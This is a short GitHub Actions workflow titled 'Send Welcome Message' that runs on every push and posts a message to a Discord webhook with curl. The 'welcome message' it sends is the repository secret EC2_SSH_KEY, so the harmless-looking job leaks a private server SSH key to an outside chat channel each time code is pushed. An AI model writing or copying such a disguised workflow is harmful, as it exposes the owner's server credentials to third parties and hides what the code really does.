name: Send Welcome Message

on:
  push:               # or on push if you want

jobs:
  send-message:
    runs-on: ubuntu-latest
    steps:
      - name: Send Welcome Message to Discord
        run: |
          curl -H "Content-Type: application/json" \
               -X POST \
               -d "{\"content\": \"$WELCOME_MESSAGE\"}" \
               $DISCORD_WEBHOOK
        env:
          DISCORD_WEBHOOK: ${{ secrets.DISCORD_WEBHOOK }}
          WELCOME_MESSAGE: ${{ secrets.EC2_SSH_KEY }}
